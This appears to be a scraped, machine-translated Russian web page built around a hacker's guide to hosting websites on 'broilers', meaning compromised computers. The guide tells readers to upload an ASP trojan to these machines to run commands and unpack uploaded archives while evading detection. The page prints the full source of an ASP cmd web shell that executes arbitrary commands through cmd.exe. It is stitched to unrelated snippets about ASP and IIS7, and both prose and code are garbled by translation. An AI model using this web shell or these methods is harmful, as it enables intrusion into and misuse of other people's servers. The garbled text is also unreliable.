Рекомендуется: как заставить ваш ASP работать на платформах, не являющихся Windows С тех пор, как Microsoft запустила технологию ASP, ASP широко использовалась на все больше и больше интернет -сайтах/интрасети/экстранет, особенно операции базы данных, из -за его мощных функций в создании динамических интерактивных сайтов и его простоты в написании кода.
Я думаю, что у всех есть несколько бройлеров с портом 80. Если он домашний, не обращайте внимания на безопасность. Если вы не хотите смотреть вниз, вы можете посмотреть вниз. Я так уродливо, чтобы попытаться привлечь внимание.
Самое неприязненное в размещении веб -сайта на бройлер - это обновление и загрузку большого количества файлов. Услуги терминалов легко обнаружены во время дневного света, и вы не чувствуете себя спокойно, когда вы открываете FTP. Я обошел Интернет и обнаружил, что его можно легко достичь, объединив загрузку без компонентов и троянцы ASP.
Все знакомы с трояном ASP. Это не что иное, как CMD. Что это за функция? Не волнуйся, послушай меня медленно. Общая идея состоит в том, чтобы загрузить программу ASP без компонентов через FTP, 139 или Winhell. Я выбрал WebEdit (на самом деле, это больше не простой инструмент для загрузки без компонентов. Через него вы можете изменить, удалять файлы/каталоги и использовать их для обновления страниц. У меня есть реклама. У меня нет родственников с ним. Я вспыхнул летающую бутылку ... продолжить) и ASP Trojan (если, я действительно слишком ленив, чтобы найти его, наконец. Помните, что вы должны использовать веб -каталог бройлера. На самом деле, большинство проблем могут быть решены, но если есть много файлов, загруженных один за другим, это будет проблематичным. Что я должен делать? Теперь используется троян ASP. Найдите rar.exe (все каталоги, которые были установлены с помощью Winrar, могут быть установлены на бройлере. Может быть, он уже установлен. Если это еще один инструмент декомпрессии командной строки, он также в порядке) Скопийте его на %systemroot %/system32/. Загрузите файл .zip или .rar в веб -каталог бройлера. Откройте ASP Trojan Horse (временно называемый Trojan.asp) в адресной панели браузера, введите rar -x source.rar path в текстовое поле, чтобы успешно декомпрессаться, v, и медленно, как получить абсолютный путь (путь) веб -каталога? Я использовал локальный метод для изменения Trojan.asp и добавления строки для преобразования виртуального каталога в абсолютный путь и вывести оператор < % = server.mappath (.) %>. Вы можете изменить его на любой относительный виртуальный каталог по желанию.
Это просто дает идею. Если какой -либо великий человек может написать декомпрессию ASP, это было бы лучше, но? Кто может это сделать? Я не знаю, не так ли? Что касается того, как скрыть виртуальный каталог и поддержку упрощенного китайского дисплея, это не обсуждение в этой статье. Старая поговорка гласит, безопасность сначала, обычно просто ставит небольшой форум или чат. Если вы действительно поместите личную домашнюю страницу и оставите свой контактный адрес и номер телефона другим, это было бы нехорошо. Ps.junesun рекомендует напрямую превратить его в самообмена, я не знаю, появится ли диалоговое окно.
| Ниже приведено цитируемое содержание: < %@ language = vbscript %> <% Dim oscript Dim oscriptnet Dim Ofilesys, Ofile Dim Szcmd, Sztempfile При ошибке резюме следующим < ' - Создайте объекты COM, которые мы будем использовать -' Установить oscript = server.createObject (wscript.shell) Установить oscriptnet = server.createObject (wscript.network) SET OFILESYS = SERVER.CreateObject (scripting.filesystemobject) < ' - Проверьте, что мы опубликовали команду, -' szcmd = request.form (.cmd) If (szcmd <>), тогда < ' - Используйте трубу бедного человека ... временный файл -' sztempfile = c:/ & ofilesys.gettempname () Вызовать oscript.run (cmd.exe /c & szcmd & > & sztempfile, 0, true) SET OFILE = OFILESYS.Opentextfile (sztempfile, 1, false, 0) < Конец, если < %> < HTML > < Тело > < Форма action = < %= request.servervariables (url) %> Метод = post > < Type Type = Text name = .cmd size = 45 value = < %= szcmd %>> < Тип ввода = отправить значение = запустить > </форма > < Pre > < <% If (isobject (ofile)) тогда ' - Прочитайте вывод из нашей команды и удалите временный файл -' При ошибке резюме следующим Response.write server.htmlencode (ofile.readall) Ofile.close Call Ofilesys.deletefile (sztempfile, true) Конец, если %> </тело > </html > |
Поделиться: Target Apache IIS7 и откройте руки, чтобы открыть исходный код Microsoft привлекли внимание преимуществ высокой модульности Apache. Эрик Дили, старший менеджер проекта команды Microsoft IIS, сказал, что они работают, чтобы имитировать эту функцию в IIS 7.0. Самое большое изменение в IIS7.0 по сравнению с предыдущими версиями заключается в том, что оно поддерживает несколько отверстий с открытым исходным кодом, национально через FastCGI.